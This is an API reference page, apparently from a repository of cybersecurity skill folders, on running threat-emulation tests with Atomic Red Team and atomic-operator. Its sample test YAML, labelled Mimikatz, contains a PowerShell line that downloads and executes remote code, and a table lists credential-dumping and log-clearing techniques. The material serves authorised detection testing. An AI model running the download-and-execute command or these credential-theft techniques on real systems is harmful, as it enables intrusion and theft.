mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-15 23:44:56 +03:00
mukul975
27c6414ca5
Complete skill folder anatomy across all cybersecurity skills: - scripts/agent.py: 80-150 line Python agents using real libraries (impacket, boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.) - references/api-reference.md: real API documentation with method signatures - LICENSE: MIT license for all skill folders
1.7 KiB
1.7 KiB
API Reference: Performing Threat Emulation with Atomic Red Team
atomic-operator (Python)
from atomic_operator import AtomicOperator
operator = AtomicOperator()
# Run specific technique
operator.run(
technique="T1059.001",
atomics_path="./atomic-red-team/atomics",
test_numbers=[1],
)
# Run with custom inputs
operator.run(technique="T1059.001", input_arguments={"command": "whoami"})
Atomic Test YAML Format
attack_technique: T1059.001
display_name: "PowerShell"
atomic_tests:
- name: "Mimikatz"
description: "Downloads and runs mimikatz"
supported_platforms: [windows]
executor:
name: powershell
command: |
IEX (New-Object Net.WebClient).DownloadString('#{url}')
cleanup_command: |
Remove-Item #{output_file}
input_arguments:
url:
description: "URL to download"
type: url
default: "https://example.com/test"
Key CLI Commands
# Clone atomics
git clone https://github.com/redcanaryco/atomic-red-team
# Install operator
pip install atomic-operator
# List tests for technique
ls atomic-red-team/atomics/T1059.001/
Coverage Mapping
| Tactic | Example Techniques |
|---|---|
| Execution | T1059.001 (PowerShell), T1059.003 (cmd) |
| Persistence | T1053.005 (Scheduled Task), T1547.001 (Run Keys) |
| Defense Evasion | T1070.001 (Clear Event Logs) |
| Credential Access | T1003.001 (LSASS), T1558.003 (Kerberoasting) |
References
- Atomic Red Team: https://github.com/redcanaryco/atomic-red-team
- atomic-operator: https://github.com/redcanaryco/atomic-operator
- ATT&CK Navigator: https://mitre-attack.github.io/attack-navigator/